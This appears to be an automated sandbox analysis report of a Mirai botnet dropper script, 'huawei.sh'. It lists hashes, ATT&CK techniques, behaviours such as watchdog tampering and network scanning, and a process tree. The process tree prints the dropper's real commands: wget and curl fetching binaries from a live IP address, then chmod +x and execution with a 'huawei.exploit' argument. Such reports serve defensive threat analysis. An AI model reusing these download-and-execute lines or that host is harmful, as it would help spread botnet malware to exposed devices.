mirai | 327c9cb0c729c36cd319c1c289868f40cdfecd6cf41b9697cfdfdc48dd38c827

Analysis

max time kernel
145s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
11/12/2024, 21:52

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

huawei.sh
Size

2KB
MD5

d733ae5816517dae48097b7f847accb5
SHA1

72997aecdd0ab479d3678cf57a57d4a2f10fcf11
SHA256

327c9cb0c729c36cd319c1c289868f40cdfecd6cf41b9697cfdfdc48dd38c827
SHA512

827cf08cc886e6404480bdbfadc55467bef16099b104734ed664fc608109ac09c248be8f83b4938c5f7a073a97a14c5f01ef33ec8acb16bd0f34b2debf32593e

Score

10^/10

mirai botnet botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (106195) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1511	chmod
1516	chmod
1525	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/Andrew	1512	Andrew
/tmp/Andrew	1517	Andrew
/tmp/Andrew	1526	Andrew

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Andrew
File opened for modification	/dev/misc/watchdog	Andrew
File opened for modification	/dev/watchdog	Andrew
File opened for modification	/dev/misc/watchdog	Andrew

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	Andrew

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-3.dat	upx
behavioral1/files/fstream-6.dat	upx

Changes its process name 2 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	/var/Sofia	1517	Andrew
Changes the process name, possibly in an attempt to hide itself	/var/Sofia	1526	Andrew

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	Andrew

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/	Andrew
File opened for reading	/proc/	Andrew

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/i486	curl
File opened for modification	/tmp/Andrew	huawei.sh
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/x86	curl
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/i686	curl

/tmp/huawei.sh
/tmp/huawei.sh
1⤵
- Writes file to tmp directory
PID:1503
- /usr/bin/wget
  wget http://37.114.41.90/bins/i486
  2⤵
  PID:1504
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/i486
  2⤵
  - Writes file to tmp directory
  PID:1509
- /bin/cat
  cat i486
  2⤵
  PID:1510
- /bin/chmod
  chmod +x Andrew config-err-xTetUE huawei.sh i486 netplan_ey82z6ny snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-RaECMh
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:1512
- /usr/bin/wget
  wget http://37.114.41.90/bins/x86
  2⤵
  - Writes file to tmp directory
  PID:1513
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/x86
  2⤵
  - Writes file to tmp directory
  PID:1514
- /bin/cat
  cat x86
  2⤵
  PID:1515
- /bin/chmod
  chmod +x Andrew config-err-xTetUE huawei.sh i486 netplan_ey82z6ny snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-RaECMh x86
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Changes its process name
  - Reads runtime system information
  PID:1517
- /usr/bin/wget
  wget http://37.114.41.90/bins/i686
  2⤵
  - Writes file to tmp directory
  PID:1519
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/i686
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/chmod
  chmod +x Andrew config-err-xTetUE huawei.sh i486 i686 netplan_ey82z6ny snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-RaECMh x86
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/Andrew
  ./Andrew huawei.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1526
- /usr/bin/wget
  wget http://37.114.41.90/bins/x86_64
  2⤵
  PID:1528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/i486

Filesize
274B

MD5
090e35476de39030dfeafbcf3d3e3f43

SHA1
a4bd408cec5d1185b478e528cf60a9f5186e0b87

SHA256
0085db6c6f0d1ba4e0ea26fcc04cd3afc69a900a9fd087079c4957364bf4dd1b

SHA512
55c266d1a3bb285ec821ecac894c2f5dbae7798c08e4f829db0e8c06f22084a919ef0fb17a1ddf4640228453bee8555fa6f69025c398292c5c8382e3c466a181

Download Submit
/tmp/i686

Filesize
28KB

MD5
15fb222600a3061f5c8e5ef04e5298a6

SHA1
93b4a17632479c8a45e2554a18ea61ea7365c532

SHA256
fff08f2a1a9c20d447ac5cacb89df1287bb830a2fc0cd5866d31d9f3ba653965

SHA512
11e390838b35bdacfa84ebdfc076f564abc1538bc972895b81d2156be52177bb25d62662871ae624747cca29e089a7a9a6ef205db4c694a2c106641d33942c34

Download Submit
/tmp/x86

Filesize
28KB

MD5
54d07ade0004f03aaca028523d8f3eb6

SHA1
73606fc68439ea7ceb148f94d61dbe0235da8355

SHA256
d1270e8be4de4713834930df984a515448ca8dd0acc7b0e03e5aa7fc4428882b

SHA512
43ce9c67151734e6e907a4bf30c06e41b52d524c388273380506b604ce3fed2779ef057b282737b1e05c11055611a4bd0559567253fb1b0f3309114e20eadf4b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads